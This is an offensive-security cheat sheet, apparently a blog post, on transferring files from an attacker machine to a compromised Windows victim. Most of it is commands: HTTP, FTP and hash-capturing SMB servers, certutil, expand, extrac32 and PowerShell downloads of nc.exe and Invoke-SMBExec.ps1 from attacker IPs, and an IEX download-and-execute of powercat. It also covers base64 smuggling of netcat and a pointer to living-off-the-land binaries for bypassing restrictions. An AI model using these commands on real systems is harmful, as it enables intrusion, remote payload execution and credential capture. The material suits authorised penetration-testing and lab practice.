Transfer files – Windows

Several methods is described here, on how to transfer files between Windows system as victim and attack box.

Start HTTP Server on Attack box

Start HTTP Server vi Py module

python -m SimpleHTTPServer 80

1 2	python -m SimpleHTTPServer 80

Start FTP Server on Attack box
Start FTP via PyFTP Lib

#Install pyFTP lib
apt-get install python-pyftpdlib

#Install pyFTP lib

apt-get install python-pyftpdlib

python -m pyftpdlib -p 2121

1 2	python -m pyftpdlib -p 2121

# -w to allow anon write access!!
python -m pyftpdlib -w -p 2121

# -w to allow anon write access!!

python -m pyftpdlib -w -p 2121

Start SMB Server on Attack box
Start SMB Service via Impacket From Impacket modules:

https://github.com/CoreSecurity/impacket

To launch a simple SMB server on port 445, just specify a share name and the path you want to share:

python smbserver.py TMP /root/shells

1 2	python smbserver.py TMP /root/shells

The python script takes care of all the configurations for you, binds to 445, and accepts any authentication. It will even print out the hashed challenge responses for any system that connects to it.

certutil

certutil -urlcache -split -f "http://10.10.xx.xx:8000/nc.exe" "C:\Users\security\tmp\nc.exe"

1 2	certutil -urlcache -split -f "http://10.10.xx.xx:8000/nc.exe" "C:\Users\security\tmp\nc.exe"

expand

Start SMB share on Kali via Impacket python :

From victim run :

expand \\kali-ip\TMP\file.exe .

1 2	expand \\kali-ip\TMP\file.exe .

Note. low priv user typically has write access to C:\Windows\Tasks or Temp.

extrac32

extrac32 /Y /C \\10.11.xx.xxx\TMP\MS14-058.exe C:\Windows\Temp\MS14058.exe

1 2	extrac32 /Y /C \\10.11.xx.xxx\TMP\MS14-058.exe C:\Windows\Temp\MS14058.exe

Powershell

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.7:8000/Invoke-SMBExec.ps1", "C:\Users\Administrator\test2\Invoke-SMBExec.ps1")

Invoke-WebRequest "http://10.10.14.7:8000/Invoke-SMBExec.ps1" -OutFile "C:\Users\security\tmp\Invoke-SMBExec.ps1"

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.7:8000/Invoke-SMBExec.ps1", "C:\Users\Administrator\test2\Invoke-SMBExec.ps1")

Invoke-WebRequest "http://10.10.14.7:8000/Invoke-SMBExec.ps1" -OutFile "C:\Users\security\tmp\Invoke-SMBExec.ps1"

Powershell Download and Execute

IEX (New-Object System.Net.Webclient).DownloadString(‘http://10.10.xx.xx/powercat.ps1')

1 2	IEX (New-Object System.Net.Webclient).DownloadString(‘http://10.10.xx.xx/powercat.ps1')

Base64

Examples.

cat ncat | base64 -w 0
echo -n (paste) | base64 -d > ncat

cat ncat | base64 -w 0

echo -n (paste) | base64 -d > ncat

cat /bin/nc | base64 -w 0 > nc.b64
cat nc.b64 | base64 -d > nc

cat /bin/nc | base64 -w 0 > nc.b64

cat nc.b64 | base64 -d > nc

md5 check file integrity after transfer.

md5sum /bin/nc

7a32c9739cc63ed983ae01af2577c01c /bin/nc

chmod +x nc

md5sum nc

md5sum nc

7a32c9739cc63ed983ae01af2577c01c nc

Check https://lolbas-project.github.io/for legitimate native windows binaries that be exploited by attacker to bypass local security restrictions.

Transfer files – Windows